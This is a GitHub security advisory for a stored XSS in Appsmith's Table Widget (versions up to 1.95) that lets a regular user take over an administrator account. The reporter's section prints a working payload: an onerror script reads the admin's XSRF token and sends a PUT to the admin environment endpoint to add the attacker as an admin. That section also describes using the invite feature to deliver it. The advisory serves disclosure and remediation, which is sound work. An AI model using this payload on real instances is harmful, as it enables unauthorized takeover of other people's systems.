You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Critical Stored XSS & Privilege Escalation in Appsmith v1.95
Critical
subrata71
published
GHSA-5hw4-whxv-6794Mar 9, 2026
Package
appsmith/appsmith
Affected versions
<= 1.95
Patched versions
1.96
Description
Summary
A Critical Stored XSS vulnerability exists in the Table Widget (TableWidgetV2). The root cause is a lack of HTML sanitization in the React component rendering pipeline, allowing malicious attributes to be interpolated into the DOM. By leveraging the "Invite Users" feature, an attacker with a regular user account (user@gmail.com) can force a System Administrator to execute a high-privileged API call (/api/v1/admin/env), resulting in a Full Administrative Account Takeover.
Details
1. Root Cause: Lack of Output Sanitization Sink The vulnerability resides in the Table Widget's rendering engine
The BasicCell component fails to sanitize data when the columnType is set to URL or Plain Text. It returns raw user-supplied values that are directly rendered as React children, which the browser interprets as executable HTML.
constcontentToRender=useMemo(()=>{switch(columnType){caseColumnTypes.URL:
// Direct interpolation of 'url' into href without sanitizationreturn<ahref={url}target="_blank">{value}</a>;default:
returnvalue;// Line 141: Raw value returned}},[columnType,url,value]);// Line 173: Final sink where unsanitized content is injected into the DOM<Contentref={contentRef}>{contentToRender}</Content>
2. Attack Vector: XSS-to-CSRF via Social Engineering (Invite Feature) Although the SESSION cookie is protected by HttpOnly, the XSRF-TOKEN is accessible via document.cookie. Since Appsmith allows any user to "Invite" others to their app, an attacker can use this as a delivery mechanism to execute a Cross-Privilege Request Forgery (CPRF) within the Admin's active session.
PoC (Proof of Concept)
Step 1: XSS Vulnerability Verification
Log in with a regular user account: user@gmail.com.
Use the "Share" feature to invite the System Administrator (admin@gmail.com) to the app. This forces the Admin to view the malicious table upon opening the invitation.
Once the Admin launches the app, the script executes in the background. It reads the Admin's XSRF-TOKEN and sends a PUT request to add user@gmail.com to the administrative whitelist.
Result: Log in again as user@gmail.com. You will now have full access to the Admin Settings and all instance configurations.
Risk: Complete compromise of the Appsmith instance. Attackers gain access to sensitive environment variables, database credentials, and the ability to modify any application within the instance.
Recommended Remediation
Sanitize Sinks: Wrap all dynamic outputs in BasicCell.tsx and related components with DOMPurify.sanitize().
Hardened CSP: Implement a strict connect-src policy to prevent unauthorized API calls to administrative endpoints from XSS payloads.
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Learn more on MITRE.
The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.
Learn more on MITRE.
The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.
Learn more on MITRE.
drkim-dev Reporter
Summary
A Critical Stored XSS vulnerability exists in the Table Widget (
TableWidgetV2). The root cause is a lack of HTML sanitization in the React component rendering pipeline, allowing malicious attributes to be interpolated into the DOM. By leveraging the "Invite Users" feature, an attacker with a regular user account (user@gmail.com) can force a System Administrator to execute a high-privileged API call (/api/v1/admin/env), resulting in a Full Administrative Account Takeover.Details
1. Root Cause: Lack of Output Sanitization Sink The vulnerability resides in the Table Widget's rendering engine
File:
app/client/src/widgets/TableWidgetV2/component/cellComponents/BasicCell.tsxThe
BasicCellcomponent fails to sanitize data when thecolumnTypeis set toURLorPlain Text. It returns raw user-supplied values that are directly rendered as React children, which the browser interprets as executable HTML.Vulnerable Code Snippet (Lines 132-143 & 172-173):
2. Attack Vector: XSS-to-CSRF via Social Engineering (Invite Feature) Although the
SESSIONcookie is protected byHttpOnly, theXSRF-TOKENis accessible viadocument.cookie. Since Appsmith allows any user to "Invite" others to their app, an attacker can use this as a delivery mechanism to execute a Cross-Privilege Request Forgery (CPRF) within the Admin's active session.PoC (Proof of Concept)
Step 1: XSS Vulnerability Verification
Log in with a regular user account:
user@gmail.com.Create a new application and add a Table Widget.
In the Table Data property, inject the following:
[{ "id": 1, "payload": "<img src=x onerror=\"alert('XSS_Confirmed_at_'+document.domain)\">" }]--
Step 2: Weaponization (Full Admin Takeover)
user@gmail.com, update the Table Data with the following payload designed to modify the administrative environment:[ { "id": 1, "Status": "System Update Required", "payload": "<img src=x onerror=\"const t=document.cookie.match(/XSRF-TOKEN=([^;]+)/)[1];fetch('/api/v1/admin/env',{method:'PUT',headers:{'content-type':'application/json','x-xsrf-token':t},body:JSON.stringify({'APPSMITH_ADMIN_EMAILS':'admin@gmail.com,user@gmail.com'})}).then(()=>alert('Admin Privileges Granted to user@gmail.com'));\">" } ]Use the "Share" feature to invite the System Administrator (
admin@gmail.com) to the app. This forces the Admin to view the malicious table upon opening the invitation.Once the Admin launches the app, the script executes in the background. It reads the Admin's
XSRF-TOKENand sends aPUTrequest to adduser@gmail.comto the administrative whitelist.Result: Log in again as
user@gmail.com. You will now have full access to the Admin Settings and all instance configurations.Impact
Vulnerability Type: Stored XSS / Vertical Privilege Escalation.
Severity: 9.1 (Critical) |
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:HRisk: Complete compromise of the Appsmith instance. Attackers gain access to sensitive environment variables, database credentials, and the ability to modify any application within the instance.
Recommended Remediation
Sanitize Sinks: Wrap all dynamic outputs in
BasicCell.tsxand related components withDOMPurify.sanitize().Hardened CSP: Implement a strict
connect-srcpolicy to prevent unauthorized API calls to administrative endpoints from XSS payloads.exploit_drkim.mp4